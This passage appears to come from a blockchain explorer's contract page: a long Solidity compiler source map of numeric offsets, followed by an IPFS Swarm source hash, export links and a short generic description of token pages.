10;20469:46;20465:251;;;20582:6;20557;:13;9187:16;20557:13;;;;;;;;;;;:16;;:22;20574:4;20557:22;;;;;;;;;;;;;;;;:31;;;;:::i;:::-;20532:6;:13;9187:16;20532:13;;;;;;;;;;;:16;;:22;20549:4;20532:22;;;;;;;;;;;;;;;:56;;;;20465:251;;;20620:1;20610:6;:11;;:46;;;;20650:6;20625;:13;9187:16;20625:13;;;;;;;;;;;:16;;:22;20642:4;20625:22;;;;;;;;;;;;;;;;:31;20610:46;20606:110;;;20699:4;20680:24;;;;;;;;;;;:::i;:::-;;;;;;;;20606:110;20465:251;20207:509;20148:568;20077:646;;:::o;18344:118::-;18407:4;18453:1;18431:7;:19;;;:23;18424:30;;18344:118;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:139::-;376:6;371:3;366;360:23;417:1;408:6;403:3;399:16;392:27;287:139;;;:::o;432:102::-;473:6;524:2;520:7;515:2;508:5;504:14;500:28;490:38;;432:102;;;:::o;540:377::-;628:3;656:39;689:5;656:39;:::i;:::-;711:71;775:6;770:3;711:71;:::i;:::-;704:78;;791:65;849:6;844:3;837:4;830:5;826:16;791:65;:::i;:::-;881:29;903:6;881:29;:::i;:::-;876:3;872:39;865:46;;632:285;540:377;;;;:::o;923:313::-;1036:4;1074:2;1063:9;1059:18;1051:26;;1123:9;1117:4;1113:20;1109:1;1098:9;1094:17;1087:47;1151:78;1224:4;1215:6;1151:78;:::i;:::-;1143:86;;923:313;;;;:::o;1242:75::-;1275:6;1308:2;1302:9;1292:19;;1242:75;:::o;1323:117::-;1432:1;1429;1422:12;1446:117;1555:1;1552;1545:12;1569:126;1606:7;1646:42;1639:5;1635:54;1624:65;;1569:126;;;:::o;1701:96::-;1738:7;1767:24;1785:5;1767:24;:::i;:::-;1756:35;;1701:96;;;:::o;1803:122::-;1876:24;1894:5;1876:24;:::i;:::-;1869:5;1866:35;1856:63;;1915:1;1912;1905:12;1856:63;1803:122;:::o;1931:139::-;1977:5;2015:6;2002:20;1993:29;;2031:33;2058:5;2031:33;:::i;:::-;1931:139;;;;:::o;2076:77::-;2113:7;2142:5;2131:16;;2076:77;;;:::o;2159:122::-;2232:24;2250:5;2232:24;:::i;:::-;2225:5;2222:35;2212:63;;2271:1;2268;2261:12;2212:63;2159:122;:::o;2287:139::-;2333:5;2371:6;2358:20;2349:29;;2387:33;2414:5;2387:33;:::i;:::-;2287:139;;;;:::o;2432:474::-;2500:6;2508;2557:2;2545:9;2536:7;2532:23;2528:32;2525:119;;;2563:79;;:::i;:::-;2525:119;2683:1;2708:53;2753:7;2744:6;2733:9;2729:22;2708:53;:::i;:::-;2698:63;;2654:117;2810:2;2836:53;2881:7;2872:6;2861:9;2857:22;2836:53;:::i;:::-;2826:63;;2781:118;2432:474;;;;;:::o;2912:90::-;2946:7;2989:5;2982:13;2975:21;2964:32;;2912:90;;;:::o;3008:109::-;3089:21;3104:5;3089:21;:::i;:::-;3084:3;3077:34;3008:109;;:::o;3123:210::-;3210:4;3248:2;3237:9;3233:18;3225:26;;3261:65;3323:1;3312:9;3308:17;3299:6;3261:65;:::i;:::-;3123:210;;;;:::o;3339:118::-;3426:24;3444:5;3426:24;:::i;:::-;3421:3;3414:37;3339:118;;:::o;3463:222::-;3556:4;3594:2;3583:9;3579:18;3571:26;;3607:71;3675:1;3664:9;3660:17;3651:6;3607:71;:::i;:::-;3463:222;;;;:::o;3691:619::-;3768:6;3776;3784;3833:2;3821:9;3812:7;3808:23;3804:32;3801:119;;;3839:79;;:::i;:::-;3801:119;3959:1;3984:53;4029:7;4020:6;4009:9;4005:22;3984:53;:::i;:::-;3974:63;;3930:117;4086:2;4112:53;4157:7;4148:6;4137:9;4133:22;4112:53;:::i;:::-;4102:63;;4057:118;4214:2;4240:53;4285:7;4276:6;4265:9;4261:22;4240:53;:::i;:::-;4230:63;;4185:118;3691:619;;;;;:::o;4316:77::-;4353:7;4382:5;4371:16;;4316:77;;;:::o;4399:122::-;4472:24;4490:5;4472:24;:::i;:::-;4465:5;4462:35;4452:63;;4511:1;4508;4501:12;4452:63;4399:122;:::o;4527:139::-;4573:5;4611:6;4598:20;4589:29;;4627:33;4654:5;4627:33;:::i;:::-;4527:139;;;;:::o;4672:329::-;4731:6;4780:2;4768:9;4759:7;4755:23;4751:32;4748:119;;;4786:79;;:::i;:::-;4748:119;4906:1;4931:53;4976:7;4967:6;4956:9;4952:22;4931:53;:::i;:::-;4921:63;;4877:117;4672:329;;;;:::o;5007:118::-;5094:24;5112:5;5094:24;:::i;:::-;5089:3;5082:37;5007:118;;:::o;5131:222::-;5224:4;5262:2;5251:9;5247:18;5239:26;;5275:71;5343:1;5332:9;5328:17;5319:6;5275:71;:::i;:::-;5131:222;;;;:::o;5359:474::-;5427:6;5435;5484:2;5472:9;5463:7;5459:23;5455:32;5452:119;;;5490:79;;:::i;:::-;5452:119;5610:1;5635:53;5680:7;5671:6;5660:9;5656:22;5635:53;:::i;:::-;5625:63;;5581:117;5737:2;5763:53;5808:7;5799:6;5788:9;5784:22;5763:53;:::i;:::-;5753:63;;5708:118;5359:474;;;;;:::o;5839:86::-;5874:7;5914:4;5907:5;5903:16;5892:27;;5839:86;;;:::o;5931:112::-;6014:22;6030:5;6014:22;:::i;:::-;6009:3;6002:35;5931:112;;:::o;6049:214::-;6138:4;6176:2;6165:9;6161:18;6153:26;;6189:67;6253:1;6242:9;6238:17;6229:6;6189:67;:::i;:::-;6049:214;;;;:::o;6269:329::-;6328:6;6377:2;6365:9;6356:7;6352:23;6348:32;6345:119;;;6383:79;;:::i;:::-;6345:119;6503:1;6528:53;6573:7;6564:6;6553:9;6549:22;6528:53;:::i;:::-;6518:63;;6474:117;6269:329;;;;:::o;6604:117::-;6713:1;6710;6703:12;6727:180;6775:77;6772:1;6765:88;6872:4;6869:1;6862:15;6896:4;6893:1;6886:15;6913:281;6996:27;7018:4;6996:27;:::i;:::-;6988:6;6984:40;7126:6;7114:10;7111:22;7090:18;7078:10;7075:34;7072:62;7069:88;;;7137:18;;:::i;:::-;7069:88;7177:10;7173:2;7166:22;6956:238;6913:281;;:::o;7200:129::-;7234:6;7261:20;;:::i;:::-;7251:30;;7290:33;7318:4;7310:6;7290:33;:::i;:::-;7200:129;;;:::o;7335:311::-;7412:4;7502:18;7494:6;7491:30;7488:56;;;7524:18;;:::i;:::-;7488:56;7574:4;7566:6;7562:17;7554:25;;7634:4;7628;7624:15;7616:23;;7335:311;;;:::o;7652:117::-;7761:1;7758;7751:12;7792:710;7888:5;7913:81;7929:64;7986:6;7929:64;:::i;:::-;7913:81;:::i;:::-;7904:90;;8014:5;8043:6;8036:5;8029:21;8077:4;8070:5;8066:16;8059:23;;8130:4;8122:6;8118:17;8110:6;8106:30;8159:3;8151:6;8148:15;8145:122;;;8178:79;;:::i;:::-;8145:122;8293:6;8276:220;8310:6;8305:3;8302:15;8276:220;;;8385:3;8414:37;8447:3;8435:10;8414:37;:::i;:::-;8409:3;8402:50;8481:4;8476:3;8472:14;8465:21;;8352:144;8336:4;8331:3;8327:14;8320:21;;8276:220;;;8280:21;7894:608;;7792:710;;;;;:::o;8525:370::-;8596:5;8645:3;8638:4;8630:6;8626:17;8622:27;8612:122;;8653:79;;:::i;:::-;8612:122;8770:6;8757:20;8795:94;8885:3;8877:6;8870:4;8862:6;8858:17;8795:94;:::i;:::-;8786:103;;8602:293;8525:370;;;;:::o;8901:829::-;9003:6;9011;9019;9068:2;9056:9;9047:7;9043:23;9039:32;9036:119;;;9074:79;;:::i;:::-;9036:119;9194:1;9219:53;9264:7;9255:6;9244:9;9240:22;9219:53;:::i;:::-;9209:63;;9165:117;9349:2;9338:9;9334:18;9321:32;9380:18;9372:6;9369:30;9366:117;;;9402:79;;:::i;:::-;9366:117;9507:78;9577:7;9568:6;9557:9;9553:22;9507:78;:::i;:::-;9497:88;;9292:303;9634:2;9660:53;9705:7;9696:6;9685:9;9681:22;9660:53;:::i;:::-;9650:63;;9605:118;8901:829;;;;;:::o;9736:474::-;9804:6;9812;9861:2;9849:9;9840:7;9836:23;9832:32;9829:119;;;9867:79;;:::i;:::-;9829:119;9987:1;10012:53;10057:7;10048:6;10037:9;10033:22;10012:53;:::i;:::-;10002:63;;9958:117;10114:2;10140:53;10185:7;10176:6;10165:9;10161:22;10140:53;:::i;:::-;10130:63;;10085:118;9736:474;;;;;:::o;10216:180::-;10264:77;10261:1;10254:88;10361:4;10358:1;10351:15;10385:4;10382:1;10375:15;10402:320;10446:6;10483:1;10477:4;10473:12;10463:22;;10530:1;10524:4;10520:12;10551:18;10541:81;;10607:4;10599:6;10595:17;10585:27;;10541:81;10669:2;10661:6;10658:14;10638:18;10635:38;10632:84;;10688:18;;:::i;:::-;10632:84;10453:269;10402:320;;;:::o;10728:180::-;10776:77;10773:1;10766:88;10873:4;10870:1;10863:15;10897:4;10894:1;10887:15;10914:102;10956:8;11003:5;11000:1;10996:13;10975:34;;10914:102;;;:::o;11022:848::-;11083:5;11090:4;11114:6;11105:15;;11138:5;11129:14;;11152:712;11173:1;11163:8;11160:15;11152:712;;;11268:4;11263:3;11259:14;11253:4;11250:24;11247:50;;;11277:18;;:::i;:::-;11247:50;11327:1;11317:8;11313:16;11310:451;;;11742:4;11735:5;11731:16;11722:25;;11310:451;11792:4;11786;11782:15;11774:23;;11822:32;11845:8;11822:32;:::i;:::-;11810:44;;11152:712;;;11022:848;;;;;;;:::o;11876:1073::-;11930:5;12121:8;12111:40;;12142:1;12133:10;;12144:5;;12111:40;12170:4;12160:36;;12187:1;12178:10;;12189:5;;12160:36;12256:4;12304:1;12299:27;;;;12340:1;12335:191;;;;12249:277;;12299:27;12317:1;12308:10;;12319:5;;;12335:191;12380:3;12370:8;12367:17;12364:43;;;12387:18;;:::i;:::-;12364:43;12436:8;12433:1;12429:16;12420:25;;12471:3;12464:5;12461:14;12458:40;;;12478:18;;:::i;:::-;12458:40;12511:5;;;12249:277;;12635:2;12625:8;12622:16;12616:3;12610:4;12607:13;12603:36;12585:2;12575:8;12572:16;12567:2;12561:4;12558:12;12554:35;12538:111;12535:246;;;12691:8;12685:4;12681:19;12672:28;;12726:3;12719:5;12716:14;12713:40;;;12733:18;;:::i;:::-;12713:40;12766:5;;12535:246;12806:42;12844:3;12834:8;12828:4;12825:1;12806:42;:::i;:::-;12791:57;;;;12880:4;12875:3;12871:14;12864:5;12861:25;12858:51;;;12889:18;;:::i;:::-;12858:51;12938:4;12931:5;12927:16;12918:25;;11876:1073;;;;;;:::o;12955:281::-;13013:5;13037:23;13055:4;13037:23;:::i;:::-;13029:31;;13081:25;13097:8;13081:25;:::i;:::-;13069:37;;13125:104;13162:66;13152:8;13146:4;13125:104;:::i;:::-;13116:113;;12955:281;;;;:::o;13242:410::-;13282:7;13305:20;13323:1;13305:20;:::i;:::-;13300:25;;13339:20;13357:1;13339:20;:::i;:::-;13334:25;;13394:1;13391;13387:9;13416:30;13434:11;13416:30;:::i;:::-;13405:41;;13595:1;13586:7;13582:15;13579:1;13576:22;13556:1;13549:9;13529:83;13506:139;;13625:18;;:::i;:::-;13506:139;13290:362;13242:410;;;;:::o;13658:118::-;13729:22;13745:5;13729:22;:::i;:::-;13722:5;13719:33;13709:61;;13766:1;13763;13756:12;13709:61;13658:118;:::o;13782:139::-;13837:5;13868:6;13862:13;13853:22;;13884:31;13909:5;13884:31;:::i;:::-;13782:139;;;;:::o;13927:347::-;13995:6;14044:2;14032:9;14023:7;14019:23;14015:32;14012:119;;;14050:79;;:::i;:::-;14012:119;14170:1;14195:62;14249:7;14240:6;14229:9;14225:22;14195:62;:::i;:::-;14185:72;;14141:126;13927:347;;;;:::o;14280:285::-;14340:5;14364:23;14382:4;14364:23;:::i;:::-;14356:31;;14408:27;14426:8;14408:27;:::i;:::-;14396:39;;14454:104;14491:66;14481:8;14475:4;14454:104;:::i;:::-;14445:113;;14280:285;;;;:::o;14571:180::-;14619:77;14616:1;14609:88;14716:4;14713:1;14706:15;14740:4;14737:1;14730:15;14757:118;14844:24;14862:5;14844:24;:::i;:::-;14839:3;14832:37;14757:118;;:::o;14881:332::-;15002:4;15040:2;15029:9;15025:18;15017:26;;15053:71;15121:1;15110:9;15106:17;15097:6;15053:71;:::i;:::-;15134:72;15202:2;15191:9;15187:18;15178:6;15134:72;:::i;:::-;14881:332;;;;;:::o;15219:116::-;15289:21;15304:5;15289:21;:::i;:::-;15282:5;15279:32;15269:60;;15325:1;15322;15315:12;15269:60;15219:116;:::o;15341:137::-;15395:5;15426:6;15420:13;15411:22;;15442:30;15466:5;15442:30;:::i;:::-;15341:137;;;;:::o;15484:345::-;15551:6;15600:2;15588:9;15579:7;15575:23;15571:32;15568:119;;;15606:79;;:::i;:::-;15568:119;15726:1;15751:61;15804:7;15795:6;15784:9;15780:22;15751:61;:::i;:::-;15741:71;;15697:125;15484:345;;;;:::o;15835:167::-;15872:3;15895:22;15911:5;15895:22;:::i;:::-;15886:31;;15939:4;15932:5;15929:15;15926:41;;15947:18;;:::i;:::-;15926:41;15994:1;15987:5;15983:13;15976:20;;15835:167;;;:::o;16008:442::-;16157:4;16195:2;16184:9;16180:18;16172:26;;16208:71;16276:1;16265:9;16261:17;16252:6;16208:71;:::i;:::-;16289:72;16357:2;16346:9;16342:18;16333:6;16289:72;:::i;:::-;16371;16439:2;16428:9;16424:18;16415:6;16371:72;:::i;:::-;16008:442;;;;;;:::o;16456:222::-;16549:4;16587:2;16576:9;16572:18;16564:26;;16600:71;16668:1;16657:9;16653:17;16644:6;16600:71;:::i;:::-;16456:222;;;;:::o;16684:191::-;16724:3;16743:20;16761:1;16743:20;:::i;:::-;16738:25;;16777:20;16795:1;16777:20;:::i;:::-;16772:25;;16820:1;16817;16813:9;16806:16;;16841:3;16838:1;16835:10;16832:36;;;16848:18;;:::i;:::-;16832:36;16684:191;;;;:::o;16881:332::-;17002:4;17040:2;17029:9;17025:18;17017:26;;17053:71;17121:1;17110:9;17106:17;17097:6;17053:71;:::i;:::-;17134:72;17202:2;17191:9;17187:18;17178:6;17134:72;:::i;:::-;16881:332;;;;;:::o;17219:194::-;17259:4;17279:20;17297:1;17279:20;:::i;:::-;17274:25;;17313:20;17331:1;17313:20;:::i;:::-;17308:25;;17357:1;17354;17350:9;17342:17;;17381:1;17375:4;17372:11;17369:37;;;17386:18;;:::i;:::-;17369:37;17219:194;;;;:::o

Swarm Source

ipfs://19065e879137fd7e5f4a9f70134d8d6639df6fdc76625817f25fd02f0f9e435b
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.